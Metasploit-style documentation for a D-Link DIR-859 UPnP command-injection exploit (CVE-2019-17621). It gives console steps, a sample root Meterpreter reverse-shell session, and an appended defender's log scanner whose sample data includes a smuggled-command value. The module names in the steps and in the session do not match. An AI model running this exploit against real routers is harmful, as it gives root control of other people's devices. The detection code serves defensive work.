## Introduction

This module exploits CVE-2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-Link SOHO routers via the `service` argument to the `gena.cgi` URL.

## Vulnerable Application

Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on Firmadyne or a similar emulation framework.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
4. Do: `set RHOSTS `
5. Do: `set LHOST `
6. Do: `run`
7. You should get a session as `root`.

## Scenarios

### D-Link DIR-859 Firmware 1.05

```
msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.1
OS           : (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter >
```
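The introduction states that the injection point is the `service` argument of the `gena.cgi` URL. As an added defender's example, not part of this module or of Metasploit, the following Python helper scans web-server-style access logs for requests to `gena.cgi` whose `service` argument carries shell metacharacters, which a legitimate UPnP service identifier never contains. The log layout, the `SUBSCRIBE` method and the sample lines are constructed assumptions for the example; only the `gena.cgi` / `service` detail comes from the page.

```python
"""Flag gena.cgi requests whose `service` argument looks like shell injection.

Added detection example (not Metasploit or D-Link code). The access-log
layout and the sample lines below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Characters meaningful to /bin/sh that have no place in a UPnP service id.
SHELL_META = re.compile(r"[;|&`$<>\n]|\$\(")

# Combined-log-like layout: client, ident, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one benign subscribe, one with a ';' in `service`,
# and one unrelated request.
SAMPLE_LOG = """\
192.168.0.5 - - [10/Jan/2020:11:36:50 -0300] "SUBSCRIBE /gena.cgi?service=uuid:upnp-WANIPConnection HTTP/1.1" 200 0
192.168.0.7 - - [10/Jan/2020:11:36:52 -0300] "SUBSCRIBE /gena.cgi?service=uuid:x;id HTTP/1.1" 200 0
192.168.0.9 - - [10/Jan/2020:11:36:53 -0300] "GET /index.html HTTP/1.1" 200 512
"""


def gena_service_arg(target):
    """Return the `service` query value for a gena.cgi request, '' if absent,
    or None when the request is not for gena.cgi at all."""
    parts = urlsplit(target)
    if not parts.path.endswith("/gena.cgi"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("service")
    return values[0] if values else ""


def suspicious_gena_requests(log_text):
    """Parse access-log lines and return the gena.cgi requests whose
    `service` argument contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than guess
        service = gena_service_arg(m.group("target"))
        if service is None:
            continue  # some other endpoint
        if SHELL_META.search(service):
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "service": service,
                "status": m.group("status"),
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_gena_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['method']} gena.cgi service={hit['service']!r}")
```

The check keys on the argument content rather than on the HTTP method, so it still fires if the same parameter reaches `gena.cgi` through `GET` or `POST`; `parse_qs` percent-decodes the value first, so encoded metacharacters are caught as well. On a real router the UPnP daemon may not write an access log at all, in which case the same logic applies to a proxy or IDS capture of the LAN-side HTTP traffic.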